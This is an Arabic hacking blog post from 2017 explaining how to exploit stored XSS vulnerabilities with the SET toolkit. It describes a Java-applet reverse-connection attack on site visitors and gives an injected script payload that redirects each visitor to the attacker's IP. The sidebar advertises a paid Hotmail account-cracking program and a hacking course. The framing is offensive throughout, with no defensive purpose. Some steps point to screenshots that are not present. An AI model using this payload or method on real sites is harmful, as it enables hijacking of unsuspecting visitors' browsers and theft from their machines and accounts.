إشترك معنا ليصلك جديد الموقع

بريدك الإلكترونى فى أمان معنا

عرض محدود : عملاق اختراق الإيميل Grave HotMail v2.17 2017 بـ150دولار لفترة محدودة

آخر 5 مواضيع
برنامج اختراق بريد الهوتميل Grave HotMail v2.17 2017
برنامج اختراق بريد الهوتميل Grave HotMail v2.17 2017
تسجل الآن في اقوى دورة مدفوعة لتعليم الهكر الاحترافي
خمس خطوات لحماية بياناتك من التجسس والسرقة والضياع على أندرويد
تحميل أقوى مضاد فيروسات مجاني كامل افاست avast antivirus 2017

السبت، 18 فبراير 2017

إستغلال ثغرات XSS Stored باستخدام أداة SET

تعتبر ثغرات من اخطر الثغرات الامنية في مجال الاختراق لما تمكن المخترق من القيام بعدة تحكمات واختراقات تخصص اجهزة متصفحة الموقع المصاب وقد يكون المسؤؤل عن الموقع احد هذه الضحايا .في هذه التدوينة سوف نتطرق الى كيفية استغلالها بشكل احترافي واستعمال اداة SETالشهيرة لضمان نجاح استغلال هذا النوع من الثغرات الامنية 

كما نعرف ان هذا النوع من الثغرات يمكن ان تجده في تطبيقات الويب من خلال متلا زر التعليق او اضافة موضوع او غيرها
كما في الصورة التالية
بعد تجريب اذا كانت الثغرة موجودة سواء يدويا او من خلال اداة اختبار اختراق ننتقل الى كيفية استخدام اداةSET لاستغلال هذا النوع 
بطريقة احترافية
 بعد تشغيل الاداة والولوج الى لوحة الخيارات المتنوعة كل ما علينا فعله هو
بعد اختبار هذا النوع من الهجوم والذي يستهدف مكون الجافا الموجود في المستعرض لدى المستخدمين نفوم بوضع الايبي الخاص بنا لعمل اتصال عكسي وكذلك استخدام تصميم محدد للعرض
الخطوة الاكثر اهمية هي اختيار البايلود المناسب كما هو موضح في الصورة التالية
بعدها لاتمام الاستغلال كما تريد بالفعل عليك بالذهاب الى مكان اكتشاف الثغرة الامنية وتطبيق البايلود الخاص بذلك
<script>window.location="http://yourip"</script>

شارك هذه الصفحة وتابعنا على المواقع الاجتماعية
شارك الموضوع →
إنشر الموضوع →

0 التعليقات :

إرسال تعليق